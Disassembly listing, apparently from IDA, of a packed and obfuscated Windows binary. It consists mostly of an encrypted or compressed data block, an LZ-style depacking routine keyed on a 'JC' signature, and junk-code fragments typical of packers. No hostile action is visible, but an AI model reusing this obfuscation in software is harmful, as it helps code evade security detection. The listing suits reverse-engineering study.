dd 0FDFE07C5h, 0DBE7FE17h, 79693E30h, 0FC46E944h, 1AD14CE2h
dd 0C0BBCE6Bh, 59957239h, 15C1C9A6h, 6B7CE164h, 0A2D155F0h
dd 5355DC7Ch, 0D7CE4FAh, 0BF9ED7Ch, 0C878F00Dh, 361A4B1Bh
dd 0FC87E326h, 9D17F66Ah, 2D1D9231h, 0BF7BB219h, 98CD719Dh
dd 44CA7B3Bh, 64D2DE5h, 0D52759D7h, 0AA996401h, 5711E758h
dd 0AACB925Dh, 52B94E4Dh, 0BB03C6FBh, 6EE81797h, 5BC93154h
dd 482F82D1h, 54AC661Dh, 21ACE7A1h, 0B35951Ah, 0E9A95560h
dd 315B118Bh, 0D61D54E2h, 533D5407h, 0BB274948h, 0E2AD68D8h
dd 0AEB9AC96h, 3CDD6D75h, 44AAD99Dh, 0FB525FB4h, 4F8AF43Bh
dd 61A94847h, 602BE5A3h, 46BEFC2Bh, 9CBF5B8Ch, 2DC53B0h
dd 8A6EBF76h, 8C046A55h, 0AC7536DBh, 3EABB42h, 0B29432FCh
dd 0ADA93BDEh, 6CBFEB1Fh, 0B3A22A03h, 54DBAF0Eh, 0D171DB5Bh
dd 4E8477C5h, 0E778A6Dh, 0F43E0BB9h, 49842FB2h, 3B51756h
dd 416BF39Eh, 0F585B309h, 0A42E035Ah, 0C5CDAD18h, 355179A7h
dd 0BCD75D11h, 97B994A4h, 6B97C5DFh, 3CC0FA9Dh, 5552D545h
dd 0C2C7C8BBh, 85D795Bh, 0F2D521B8h, 0E6FD07A9h, 0FEAC5565h
dd 0E3E0FF82h, 0EE6B4763h, 78328EC3h, 0F17EF5F9h, 0C891F595h
dd 5608BA35h, 2134FC66h, 95C3A515h, 0DFB4E541h, 34BA2A90h
dd 0F5AF7005h, 0DC5FB965h, 0F48ACB77h, 0D316A331h, 81E453B7h
dd 9F2CC97Fh, 412B7DB3h, 260A3CCBh, 0C40FF47Bh, 0C72E8E92h
dd 0DC3FBD4Ch, 0CAAF9EE0h, 30CE38CAh, 0AC0E3B8Ah, 7A634CFCh
dd 16AAB2E6h, 5DDC5480h, 82D17BE9h, 49AA2EADh, 38D40F86h
dd 7564529Fh, 996A8B8Dh, 0C2B26321h, 8AA9E6D4h, 0B30D648h
dd 0A8B38D50h, 16F57DF9h, 0DE0AABF3h, 0DDF7CA2Bh, 0EF377088h
dd 0E0145E45h, 55643BBFh, 3CE1E0F8h, 7C1375Fh, 3E4B5B01h
dd 0C0FF8CEEh, 738BAE19h, 0D73C3FA8h, 7753785h, 3BCE5E61h
dd 1B90FB38h, 564C9C3Fh, 1FADA82h, 1E0FA873h, 5AFDE81h
dd 7F361389h, 7485B7F2h, 0B792D955h, 0F9D10114h, 0AD1303C3h
dd 0AE4FE9F1h, 0A2FF3CFEh, 0B89B7E0h, 9D8F01E4h, 88EC4D2h
dd 0FF52E768h, 0C43F191Eh, 5E806B2Dh, 0FF03F6FCh, 0DCE6E1A5h
dd 0E7BEBC67h, 2FB665BCh, 0DCA396FCh, 0E7DFA4BFh, 8986855Fh
dd 0D9A53B18h, 37FF87E5h, 7245AD14h, 0B1408ADh, 615FE7E4h
dd 0A1AEBA4Ah, 59B98ABFh, 0E37551B4h, 623C9835h, 556A93DDh
dd 0A4C5D48Bh, 0F07B95FBh, 1EE95426h, 65F67B0Fh, 0FF2EB289h
dd 2AEBC5ADh, 643B68DAh, 0BA0935A7h, 18F8B272h, 7C933BB9h
dd 7FBC52F5h, 73B80181h, 2DB4C75Ah, 0E0036522h, 5F7E0F37h
dd 6FE4ED3Ch, 0FF42303Eh, 786C0BD9h, 5707C8BCh, 0CB2C7ED0h
dd 5A681E7Ch, 0C3B5150Ah, 0CE15951Bh, 0DF815D84h, 92456E44h
dd 0FC5A2A9Ah, 408BC670h, 0CDD8A9E0h, 573D8A0Fh, 157E410Fh
dd 0C6925C2Fh, 69BD9560h, 0B2E7C7C4h, 0C8266BE5h, 2D56FA03h
dd 0D79D536Eh, 0BA53CE3Fh, 0FC1E984Ch, 92964CE6h, 0ACFF3B8Bh
dd 0BD8F3913h, 50F6C8DEh, 7953C744h, 257CC84Eh, 0F4AD57E5h
dd 86E35AC0h, 0E679BFB4h, 4978E397h, 99F3F07Dh, 0D0C28497h
dd 86EA167Eh, 0D102EAD5h, 66EDD575h, 36DD8B02h, 153D7C77h
dd 0C5033A19h, 0BCDD69EEh, 0C7A66797h, 905C3B30h, 0FC572F08h
dd 2D746EC2h, 8E86B7B8h, 0BE9B5547h, 4AEA02Eh, 7535EFA3h
dd 0FA992EE2h, 352388D1h, 651F748Dh, 74DC3FB8h, 548BADEEh
dd 0CFFA6620h, 2EDB3F2Ah, 0F970010Ch, 0FE2B0FC4h, 74FB0BAEh
dd 71A3D3ADh, 0A29D2E10h, 0D55161C6h, 0CA80F69Fh, 2C015B4Ch
dd 0CD2D5F75h, 552C91FFh, 430CA763h, 91BBF4ACh, 0F233C57h
dd 7DA12FE0h, 3132F3F7h, 84D2A17Ch, 1DF757B3h, 6ED78DB4h
dd 0CAC42647h, 0DB10AF89h, 0BA2F415Dh, 62FB05F6h, 0E4B5CA1Eh
dd 0A835EE65h, 680E4D57h, 27F2091Dh, 0FE4CADB8h, 0A7376148h
dd 86E0285Dh, 0E68A47D5h, 0B4328FE6h, 8E9D9D2h, 8BFD3067h
dd 11BEE75Ah, 0CD2D1D8Bh, 782A2EEDh, 45026DAAh, 62BA0227h
dd 0DA0BEA29h, 3A0E5D46h, 0EEA153B4h, 6C252525h, 0F5B7CAABh
dd 0C70FD97Ch, 7F604917h, 782A307Ch, 0BE0BBA71h, 0F376D1F7h
dd 95594857h, 5E10EAAFh, 0C95D5275h, 1DFA6E84h, 0E9EF3495h
dd 715CAA59h, 7B134069h, 0C43FDF89h, 46838F33h, 0F619EBCCh
dd 746400E0h, 6E651322h, 6110E74h, 3A56AE39h, 65FD4842h
dd 0BF5246CBh, 6CAD1BBFh, 2E23075Bh, 71952630h, 6B047DC6h
dd 46A0F233h, 8FF2C8A0h, 0C1042A7Eh, 6CABF526h, 3EADAACFh
dd 0FD4F282Dh, 9396F24Eh, 4EBEA47Eh, 1D81F3D5h, 0A71CDC72h
dd 0C2A7CB0Fh, 0B2E106C7h, 0D6A9C8DEh, 0A671A0D6h, 8CFABAA5h
dd 0AA7C3D66h, 0E4D18F67h, 9EBCABF5h, 71CE9C41h, 7ADC86FFh
dd 25FC077Dh, 35AEF508h, 7D20A042h, 0AF9B261Dh, 5527138Bh
dd 45DFEA3h, 96BFB68Ah, 8D374614h, 0AAED91CBh, 0F852D66Ah
dd 1BA8678Bh, 5DDAC818h, 0E262A6B5h, 0A963F6C5h, 31E4822Dh
dd 0C21D68CDh, 0CC339AE5h, 52809D5Fh, 296EFC24h, 586C7A35h
dd 5747FB50h, 0ABD27806h, 34F995A3h, 0FDF0DD2Ah, 0E391E29Fh
dd 7B2B3D02h, 0FEA876BBh, 8CACC36Ch, 32EA5B1Eh, 0CE0A3777h
dd 0F233910Eh, 0BAFB6C60h, 524522BAh, 0D0B5A643h, 0B73D62FCh
dd 286C5F05h, 375E0360h, 0A19A55F0h, 3F3F0CFBh, 15DC75EFh
dd 9155C1C4h, 0EF4654B4h, 259EDB27h, 0F0BF06E4h, 463C45FFh
dd 8E8959AEh, 4D617DC3h, 0A93176Fh, 428775BEh, 75AAD3B5h
dd 60BB05FEh, 87E3395Dh, 155F8993h, 0BCAF205Eh, 2CF225A9h
dd 0A0CDED65h, 1A711257h, 7C40C576h, 0CA6AAD10h, 1B3199F4h
dd 6CA2AA39h, 0A5A2C381h, 0F5CBFA14h, 1E2016E7h, 0A8EBE8F2h
dd 957B46FBh, 23DAB8D7h, 0F0277F9Eh, 23383523h, 89860A1Dh
dd 0BE030DD9h, 694BCFF6h, 0AA3EA058h, 4FDD5DF9h, 0F0781143h
dd 1F03109Fh, 0BE500F23h, 1F2B02F5h, 455FE58h, 4B4523DFh
dd 0C4C72BEEh, 7D139C9Fh, 3943B3E9h, 4780BB35h, 5E7B02BBh
dd 4EA34D90h, 0FC4669D2h, 0D58BF7BEh, 0FD101DD7h, 0DB9ACAB0h
dd 6312BFCBh, 9B3DBEAEh, 11271326h, 0BBF9B42Bh, 410BADF4h
dd 0CBBC7CC6h, 0B598B578h, 0E2C37023h, 7CF03AA2h, 0EE269B9Fh
dd 7E1CEF65h, 55A38F72h, 0FFD0F5BBh, 941DD865h, 0F8F2DAABh
dd 7E53BF12h, 584E8E26h, 0B5CDE3Ah, 0F8834615h, 5043142Ah
dd 4FB6AA1Fh, 8D96F497h, 0C8E6557Ch, 3A4FAFC1h, 7FF13101h
dd 0D6A9A787h, 0E06A3FD4h, 383EA8A9h, 9E5C32C1h, 0FCB11AF7h
dd 0C641774Fh, 0BB757372h, 0D7CCC67Ah, 8B63E311h, 0B62EAA06h
dd 230480A3h, 0D2E543F1h, 5B6DD8AAh, 0BD089E43h, 0A45712CCh
dd 42B76580h, 0ACBFFD0Fh, 8BBCE150h, 279688ABh, 0AF15B61Bh
dd 4E1A15D5h, 0DE4ABF96h, 8C96E22Fh, 35597D26h, 0FC1508C2h
dd 7B54303Ch, 7CA3CE62h, 0DFCD58BEh, 0BFA7E33Fh, 69848C47h
dd 0B419C55Eh, 21257D0Bh, 4422A022h, 0FA3A4800h, 0CABB9D03h
dd 0B1298F4Fh, 90F5DA4Ch, 7B3165F8h, 7369048Eh, 0AF035D48h
dd 0D5B5CEB7h, 0B429A243h, 17CB5082h, 59F43D8Bh, 0CA8494A2h
dd 0C920F865h, 5C07268Ah, 0D6D0C4D0h, 0C6EA0BFDh, 663A4EDFh
dd 2B33C76Dh, 3A2E8EEBh, 4DCC673Ah, 55A0EA6Bh, 0DBD8B760h
dd 81C3CB2Eh, 0FC2469BEh, 0F1758276h, 263CE345h, 0AC39BAB5h
dd 0A3CB3EECh, 655DE421h, 4E89477Eh, 8CC10AF7h, 0D0DCEDACh
dd 3CFC728Dh, 0AA78AED6h, 64F97715h, 15580A39h, 0DAC0F16Fh
dd 0E0D68E04h, 0C7F9EE50h
dd 597ABE90h, 0A823AF72h, 0CC00BB6Eh, 7C751B45h, 0EA0975A7h
dd 56703E18h, 0FF37BDC1h, 0ABEFFA8Ah, 0BCFE4DAFh, 415F48FAh
dd 1EAE2EC2h, 66923A50h, 916ACCB3h, 66F83BB7h, 0A8021C9Fh
dd 2F396825h, 58E2FD05h, 670B3B31h, 0F32FC8F1h, 442F9A74h
dd 0BF91E551h, 0C2D2530Fh, 4C282617h, 978551Ch, 0C8CAC280h
dd 0EC896CFEh, 38E61635h, 0EE02FA1Ch, 116BE4F6h, 2EAE7CA0h
dd 535544F3h, 3E92E6CAh, 3BD56AA9h, 0B1CD6B8h, 90AAF72Bh
dd 22878E2Bh, 5FF04F9Ah, 0EE5DB43Dh, 77DB6735h, 5887E035h
dd 714A918h, 0A93D673Eh, 0A9140A77h, 0AC1BE7C6h, 0A00D3F6Eh
dd 7BA890B1h, 2EE0A51Fh, 72692EB2h, 0FA79EB1Eh, 0CBAB5AADh
dd 540975EFh, 0A4DB395h, 0CFD8F55Fh, 6576E6C7h, 0A63F5034h
dd 6227E8Fh, 0A53A9AB0h, 0A485FBA1h, 0F8CB9FBCh, 32494470h
dd 3D9E8DA2h, 0B9BF6B79h, 0B08D4D55h, 8C361B51h, 33550C31h
dd 2902FACAh, 0FEA85A35h, 987AECD9h, 6585E3A5h, 6360B08Ch
dd 15095DC7h, 0BB2AE25Fh, 9BCE974Dh, 0F72AB5F0h, 0CDABEDD2h
dd 9B8253FDh, 381AF697h, 6FCEDE6Ch, 0EA17A5FCh, 4F8BEC04h
dd 0BD7056E9h, 0DEAA76F6h, 4E5FED67h, 0B95EFA40h, 617C8B72h
dd 0E50E0EDBh, 53BA6468h, 71DE34B7h, 66AB0BE1h, 34F4A4F5h
dd 0D5DE39B7h, 277EAFC8h, 974D89Ah, 0EB57E279h, 5858517Ah
dd 37733A5Bh, 0E16AFD17h, 66D1CF97h, 63B345FDh, 0D48DB60Eh
dd 5ACB24B2h, 0AC652039h, 0ECFFC15Fh, 6DECFA0Ch, 0ADA7337Dh
dd 0A9F64062h, 6D9833AFh, 0D1ACA10Bh, 645EA085h, 0A3E3D557h
dd 846D1856h, 99557B47h, 622758BAh, 8787DF4Dh, 0CBDFCD0Bh
dd 0FBE83EDFh, 0B144BF12h, 0BE1D7545h, 7A2B69A9h, 0DFB43924h
dd 0C714F132h, 0DB21D4FBh, 44602E03h, 0B1617A76h, 0A12FE903h
dd 0BA52A60Ch, 28AA5AF1h, 0A7E6BFE3h, 0C092B2F2h, 893714DCh
dd 0C7B19600h, 0A1A06241h, 0C7759F02h, 9E3D61B7h, 0A9BCA1DAh
dd 2635BB24h, 0C1541897h, 791D45B6h, 69B33588h, 0B562C48Ah
dd 8FB087E0h, 0A2DA71E9h, 0ED7078F1h, 0A66F9D7Bh, 0D9DA232Ah
dd 4857A3DFh, 3EDE6D7h, 0E49589E9h, 0AAD251DDh, 8867DAB1h
dd 0D1CDBA6Eh, 0CDC68BA5h, 7305DEB4h, 0CD57C102h, 2FBC4460h
dd 0AA37D938h, 0ADE4A836h, 66DA168Bh, 0A3EB4892h, 0DB045565h
dd 0F32BE7E2h, 67112AE9h, 0A0FB5E79h, 0C48DC455h, 0A7734F4Eh
dd 75697769h, 162EED32h, 4C99D4D1h, 4E15B768h, 0C240F80Ah
dd 4EEDDF31h, 55BF6CBBh, 53CF9482h, 69C7590Fh, 55F36BAEh
dd 6521B534h, 0F951BA9Ch, 0D89FADBAh, 0C96A80B2h, 2E9B5B76h
dd 0D12500B9h, 0EAA586F6h, 457B2962h, 32AE3BA5h, 5FB83E6Ah
dd 2ED68AADh, 0D1934D8Eh, 0AA382E0Bh, 45296D2Ah, 19F26BB7h
dd 5E1AD21Ch, 0F95666F7h, 3D2FFF89h, 0EE2DEF88h, 7BDB709Dh
dd 80F7A2C0h, 0A4225EE5h, 559EA236h, 4752EF8Ch, 2B591999h
dd 0DFEB4315h, 5BE8FBF0h, 3C382C07h, 37447573h, 0AC95EB1Bh
dd 0FA1DE663h, 265DE9E2h, 5A30D901h, 0C3C0BB6Ch, 0FA38E66h
dd 0E4121B0Ah, 0A5EF7767h, 660A2A2Dh, 0EC6FD11Bh, 0EDA5C0FAh
dd 0BA9E4E34h, 0ECBF0ABFh, 57854F5Dh, 0AA2DDA31h, 337E19D6h
dd 0DA1298E4h, 0E3527B51h, 2756A637h, 66FEED30h, 0B4DE8541h
dd 559EA3C3h, 0F0FA2CE0h, 0C6F4BC7Ah, 0CE859565h, 95A47571h
dd 0BC5A21D4h, 51EBFEF5h, 1BDC48F5h, 586E3336h, 0C84CFBFDh
dd 9E07E567h, 0A5B38225h, 87B1A552h, 541156E5h, 45A135F7h
dd 0A366704Dh, 454F75F9h, 77AA88FEh, 8539563Ah, 1505D44Ch
dd 0E7C3EFC3h, 0AF32A49Dh, 0D2BAF132h, 0FCAF3C47h, 52EB6263h
dd 1D674D22h, 8448B20h, 8D4CA4B3h, 84EF6620h, 96E2FC79h
dd 0A9F83E23h, 0F1867CCBh, 58387852h, 9CA483D5h, 81752253h
dd 0F30CB757h, 497F959Ah, 0EB5A3E11h, 58155DBDh, 88568EBEh
dd 688A9E32h, 0C1A4C0F3h, 0B1BBBB8Ah, 0A835ACC6h, 0E1F8FB86h
dd 895ED4B2h, 0EA6A5406h, 53EAB7C8h, 0D42B0D08h, 0DAF0CAA1h
dd 7955D4B0h, 27037EAFh, 87565DD3h, 332AA7FDh, 17BA4DAEh
dd 0D103C11Bh, 0B3291BE2h, 0FC38AACEh, 7B6A4A4Fh, 0A310556Dh
dd 0BDFCB85Ah, 37380FEBh, 5A8EF7C3h, 0F59751E5h, 6C756D0Ch
dd 4DBE6805h, 67B135E6h, 6E612197h, 0A10BBA59h, 6D15493Dh
dd 0FDD01B63h, 0FE46FB30h, 0EF67AD51h, 5C4D2657h, 98A5CADh
dd 604C593Bh, 0C8D60D55h, 5A47CF3Fh, 8ABEF180h, 0EF7CD1A0h
dd 0D643DC4Eh, 56D114A4h, 70D97254h, 142515A8h, 9C957484h
dd 0DC287AA1h, 0F1BDBDB4h, 0AC8D836Bh, 86E1D329h, 46ADD8E2h
dd 0BE69F6FAh, 5BAD5D90h, 0C7E975ADh, 46AFAE25h, 0FF4885A2h
dd 4562BB48h, 4753C1EAh, 0A64EB825h, 0FE160B3Eh, 289B3148h
dd 0E25C8924h, 0D45DD9Bh, 0C72243CBh, 0F5770AD7h, 7452CB6Ch
dd 0AAD68C7Ch, 0C71BB015h, 0CF34A8AEh, 0BFF65FEDh, 0C2F25CE2h
dd 0B0356B24h, 5356ED6Ah, 0CE0D02ABh, 68936697h, 986D1795h
dd 0AFA6893Eh, 7AFD4EE3h, 2AEAF50Fh, 0B456687Eh, 0FE18D78h
dd 0AACEB7D8h, 49E7EB5h, 95C9C9A1h, 0F74E96Bh, 44C8129Fh
dd 1A5C3414h, 3D740B10h, 5F9327A0h, 0F97BC5FCh, 3C0EA686h
dd 145F836Ch, 0B2971BACh, 4AFA010Eh, 0EC7F776Bh, 0AAFC9EE1h
dd 5A0E2565h, 5830D74Bh, 82A6C084h, 0E07C7E28h, 56E3583Bh
dd 194C17C3h, 40AB4D6Bh, 0E5DF3EF6h, 0CEDBD5E7h, 7CA52AF4h
dd 0F02320CCh, 0D531EE7Eh, 46A59173h, 5CCE22BAh, 0D36C7D8Dh
dd 2A5B5D4Ah, 4B72ED78h, 0BFADA212h, 0BBA2CD14h, 3299C1C9h
dd 259085AAh, 0A2F202DBh, 2CAF03D1h, 0A0E6FDD4h, 0F071BAFBh
dd 0D4478CC1h, 49ADE19Fh, 6626FC8Dh, 72B1B379h, 97D0544Ch
dd 7D402A6Dh, 0EDD5AAF3h, 61E76BB8h, 0CACE1AADh, 0EA2853FDh
dd 7AA1ECE0h, 4DB8ED74h, 4A01E7FCh, 0EB33ECD0h, 4D7EE68Bh
dd 0A57F0846h, 36C78A64h, 5B75708Eh, 68A77286h, 83E3CA8Dh
dd 0AE86142Ch, 0FAD5C6E7h, 446B2BADh, 1FD27561h, 42D6BD99h
dd 69CCB1F5h, 2074AF8Fh, 68ED1CCCh, 4C217E8Ah, 8FA6B523h
dd 6987E1Fh, 0C7797092h, 0A044F197h, 0F627D638h, 0C32B3805h
dd 71355FE5h, 0A354EADEh, 34F5C2C1h, 0DB098764h, 426F0057h
dd 6DC04B4Fh, 2C6D01C9h, 9FC9ECF1h, 0E6CD194Eh, 0F74394ADh
dd 0AD978AF7h, 2F318BFCh, 3D7AA549h, 5B3BE969h, 22496AEEh
dd 8A5E2DC1h, 14CF1AD8h, 0A75C6C5h, 0AE8C9604h, 5B3E112Dh
dd 1B6A4391h, 192D2F05h, 0C1E0441Dh, 6461B49h, 0B955A0B9h
dd 54B6E027h, 0BC07036Dh, 51D8A64Eh, 0D2367BCh, 9899CE07h
dd 0DF70C8E0h, 8DEF7CD3h, 0AABE9383h, 0E37CB7D7h, 0F59A2973h
dd 7E93569Eh, 0E33851D5h, 686D51B4h, 5362DC15h, 0ADD5067Bh
dd 0FC6549Dh, 0C110F0DAh, 0ABDA3286h, 0F2F7772Eh, 67FB752Ah
dd 0A6BC58BEh, 0EBB13E2h, 0A79F3343h, 0E9D66F93h, 0D4A6E668h
dd 6D4AA792h, 0E3CD595Ah, 9DD80AFEh, 0C1620583h, 5DF0EB72h
dd 0EEC129F5h, 0C7236873h, 72BEC2FFh, 0CC54A671h, 0F79025D0h
dd 7054EAF7h, 0A7AC54CFh, 0BECB9301h, 0BA4383EFh, 8F288483h
dd 10FE63D4h, 8DA8B362h, 0E575F291h, 87762E56h, 8C73AF84h
dd 1595D092h, 0D5A88BE3h, 818E55E9h, 9B6D8016h, 0DA95C53Dh
dd 9DAEAB10h, 0C87E2243h, 0DB770CB2h, 0ECDF54ECh, 57F825C9h
dd 7426179Ch, 0CCF5BC76h, 3291F61Ah, 3A8F0542h, 39D6D9A3h
dd 57F0581Fh, 0D592BB8Fh, 7464DD2Bh, 0B2EC8096h, 0E6455787h
dd 8C31333Ch, 0D2581DEBh
dd 0B9823561h, 62063F7Fh, 7BC31210h, 0D8F38952h, 0C15CC207h
dd 0F78F4A7Eh, 34D69572h, 6A2BE7A1h, 147C46DDh, 2FF73D40h
dd 0DA75A8F5h, 210EB962h, 0FD134508h, 41DF2ABFh, 225B0382h
dd 0F5B1631h, 2C02AC0Bh, 32D4446Ah, 0E4983BA6h, 0FF66881Ah
dd 2EB23623h, 8AAAD18Bh, 7F7965D0h, 6A728DF7h, 0A567454Bh
dd 0DCEEDF6Bh, 3520898Fh, 55466581h, 0F9487139h, 6DF5A25Dh
dd 6E500AD8h, 2D7B3228h, 76257588h, 0D2C19A9Dh, 57575937h
dd 6F267688h, 1D8FD1C7h, 0C0D7A4F9h, 0FF5958BAh, 8262235Dh
dd 0E02AC420h, 0D6CF6F54h, 75F3C32Dh, 8EB42BFCh, 0DF5B57C6h
dd 6AA1EB77h, 0F7EF5Fh, 4EF470BAh, 0E5222B3Ch, 6F23A1D1h
dd 382F1A40h, 74A672DCh, 922BF0Fh, 0ABB5B5F5h, 84B75C6Ah
dd 226964BDh, 0EEAF3976h, 0C19AE1C3h, 0F05CDA43h, 85315BFDh
dd 4EAF07B1h, 77DDE2E8h, 0DB666C91h, 39D88FEFh, 0E3C96CE7h
dd 0D81F0576h, 95A8B62Bh, 9C843E6h, 0EDAC533Eh, 2E26EA47h
dd 8CDD825Ah, 0DDC3E1F7h, 0AEFE2D19h, 0AA92B555h, 0B3AAF9B1h
dd 0E96AEA85h, 0A4B7F155h, 0BF590FC0h, 705ECC0Bh, 0FF69D6DCh
dd 4D227DA3h, 5C5655A4h, 8D2D52CFh, 19D7E325h, 0FDE5C2FEh
dd 0BF7E0D56h, 93C559Dh, 94D252FDh, 0E126CF8Dh, 3699F02Ah
dd 368DE5DBh, 0EEA652ADh, 58783C98h, 36078724h, 0CF712E0Ah
dd 6FE588C6h, 0B67E8DC6h, 91AB7469h, 0B2AE7DD3h, 36D2C31Bh
dd 0D3EA2133h, 0F8D6636Fh, 0C7BB279Eh, 0A08AD59h, 3CA883Ah
dd 88D32A65h, 0AF0D7FF1h, 0BC3D8695h, 9F80E2B3h, 7B692446h
dd 0C97C35ABh, 0C0574000h, 0CDD7h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439C1C proc near ; DATA XREF: sub_43E113+3A�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439D9B SIZE 00000004 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cld
push ebx
push edi
push esi
mov [ebp+var_4], eax
mov [ebp+var_8], edx
mov esi, eax
mov edi, edx
cmp word ptr [esi], 434Ah
jnz loc_439D5E
add esi, 0Ah
mov [ebp+var_C], 8
xor ebx, ebx
mov edx, 80000000h
inc ebx
loc_439C4D: ; CODE XREF: sub_439C1C+46�j
; sub_439C1C+8D�j ...
xor eax, eax
call sub_439D65
jnb short loc_439C64
mov ecx, [ebp+var_10]
call sub_439D7D
add al, [ebp+var_11]
loc_439C61: ; CODE XREF: sub_439C1C+65�j
stosb
jmp short loc_439C4D
; ---------------------------------------------------------------------------
loc_439C64: ; CODE XREF: sub_439C1C+38�j
call sub_439D65
jb loc_439D06
call sub_439D65
jnb short loc_439CD1
mov ecx, 4
call sub_439D7D
dec eax
jz short loc_439C61
jns loc_439D50
call sub_439D65
jnb short loc_439CAB
push ebp
loc_439C91: ; CODE XREF: sub_439C1C+8A�j
mov ebp, 100h
loc_439C96: ; CODE XREF: sub_439C1C+83�j
call sub_439D72
mov [edi], al
inc edi
dec ebp
jnz short loc_439C96
call sub_439D65
jb short loc_439C91
pop ebp
jmp short loc_439C4D
; ---------------------------------------------------------------------------
loc_439CAB: ; CODE XREF: sub_439C1C+72�j
mov ecx, 1
call sub_439D7D
add eax, 7
mov [ebp+var_10], eax
mov [ebp+var_11], 0
cmp eax, 8
jz short loc_439C4D
call sub_439D72
mov [ebp+var_11], al
jmp loc_439C4D
; ---------------------------------------------------------------------------
loc_439CD1: ; CODE XREF: sub_439C1C+58�j
mov ecx, 7
call sub_439D7D
push eax
mov ecx, 2
call sub_439D7D
mov ecx, eax
inc ecx
inc ecx
pop eax
or eax, eax
jz short loc_439CF3
mov ebx, eax
jmp short loc_439D51
; ---------------------------------------------------------------------------
loc_439CF3: ; CODE XREF: sub_439C1C+D1�j
cmp ecx, 2
jz short loc_439D5E
inc ecx
call sub_439D7D
mov [ebp+var_C], eax
jmp loc_439C4D
; ---------------------------------------------------------------------------
loc_439D06: ; CODE XREF: sub_439C1C+4D�j
call sub_439D89
dec ecx
loop loc_439D17
mov eax, ebx
call sub_439D89
jmp short loc_439D51
; ---------------------------------------------------------------------------
loc_439D17: ; CODE XREF: sub_439C1C+F0�j
dec ecx
mov eax, ecx
push ebp
mov ecx, [ebp+var_C]
mov ebp, eax
xor eax, eax
shl ebp, cl
call sub_439D7D
or eax, ebp
pop ebp
mov ebx, eax
call sub_439D89
cmp eax, 10000h
jnb short loc_439D4E
cmp eax, 37FFh
jnb short loc_439D4F
cmp eax, 27Fh
jnb short loc_439D50
cmp eax, 7Fh
ja short loc_439D51
inc ecx
loc_439D4E: ; CODE XREF: sub_439C1C+11C�j
inc ecx
loc_439D4F: ; CODE XREF: sub_439C1C+123�j
inc ecx
loc_439D50: ; CODE XREF: sub_439C1C+67�j
; sub_439C1C+12A�j
inc ecx
loc_439D51: ; CODE XREF: sub_439C1C+D5�j
; sub_439C1C+F9�j ...
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_439C4D
; ---------------------------------------------------------------------------
loc_439D5E: ; CODE XREF: sub_439C1C+19�j
; sub_439C1C+DA�j
mov eax, esi
pop esi
pop edi
pop ebx
jmp short loc_439D9B
sub_439C1C endp
; =============== S U B R O U T I N E =======================================
sub_439D65 proc near ; CODE XREF: sub_439C1C+33�p
; sub_439C1C:loc_439C64�p ...
add edx, edx
jnz short locret_439D71
mov edx, [esi]
add esi, 4
stc
adc edx, edx
locret_439D71: ; CODE XREF: sub_439D65+2�j
retn
sub_439D65 endp
; =============== S U B R O U T I N E =======================================
sub_439D72 proc near ; CODE XREF: sub_439C1C:loc_439C96�p
; sub_439C1C+A8�p
mov ecx, 8
call sub_439D7D
retn
sub_439D72 endp
; =============== S U B R O U T I N E =======================================
sub_439D7D proc near ; CODE XREF: sub_439C1C+3D�p
; sub_439C1C+5F�p ...
xor eax, eax
loc_439D7F: ; CODE XREF: sub_439D7D+9�j
call sub_439D65
adc eax, eax
loop loc_439D7F
retn
sub_439D7D endp
; =============== S U B R O U T I N E =======================================
sub_439D89 proc near ; CODE XREF: sub_439C1C:loc_439D06�p
; sub_439C1C+F4�p ...
xor ecx, ecx
inc ecx
loc_439D8C: ; CODE XREF: sub_439D89+F�j
call sub_439D65
adc ecx, ecx
call sub_439D65
jb short loc_439D8C
retn
sub_439D89 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439C1C
loc_439D9B: ; CODE XREF: sub_439C1C+147�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_439C1C
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_439DA0 proc near ; DATA XREF: sub_43E10D�o
; sub_43E113+29�o
; FUNCTION CHUNK AT 0043AB23 SIZE 00000014 BYTES
cdq
jmp loc_43AB23
sub_439DA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov eax, [ebp-4]
pop ecx
xchg ecx, [esp]
mov ebp, ecx
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_237. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, offset word_43BFD6
jmp loc_43AB73
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DF7B
loc_439DC1: ; CODE XREF: sub_43DF7B+A�j
jmp loc_43A03C
; END OF FUNCTION CHUNK FOR sub_43DF7B
; ---------------------------------------------------------------------------
dw 0E900h ; CODE XREF: _5qvhby1c:0043C0E5�j
; ---------------------------------------------------------------------------
cmp eax, 29h
or edi, 55C67203h
jmp loc_43B891
; ---------------------------------------------------------------------------
and ebp, 8FDE2F5Dh
add eax, 0BBAD45E5h
or eax, 45DD4014h
push offset dword_43D0F8
jmp loc_43BF29
; ---------------------------------------------------------------------------
dd 0CA0B0000h, 0F7BE9h, 81000000h, 3B3BAEC0h, 96F08132h
dd 3C538EEh, 0BAC081C5h, 7A95AA9Ch, 54AA9D00h, 2BE9E005h
dd 0E8000013h, 1A55h, 8EE90000h, 23h, 3F40E9h, 0C7810000h
dd 0FB837CFAh, 12EAE99Dh, 87000000h, 1C872414h, 5BD38B24h
dd 0E2E9C503h, 2Bh, 0E900C300h, 3F10h, 40DCE900h, 0
; ---------------------------------------------------------------------------
loc_439E60: ; CODE XREF: _5qvhby1c:0043A697�j
jmp loc_43C96E
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_439E68 proc near ; CODE XREF: sub_43B7F1-D1E�p
push offset word_43C536
jmp nullsub_221
sub_439E68 endp
; ---------------------------------------------------------------------------
dw 8700h
; ---------------------------------------------------------------------------
or al, 24h
push ebp
mov ebp, esi
xchg ebp, [esp]
pushf
push 308F6D4Ch
pop esi
jmp loc_43D313
; ---------------------------------------------------------------------------
db 0Fh
db 86h ;
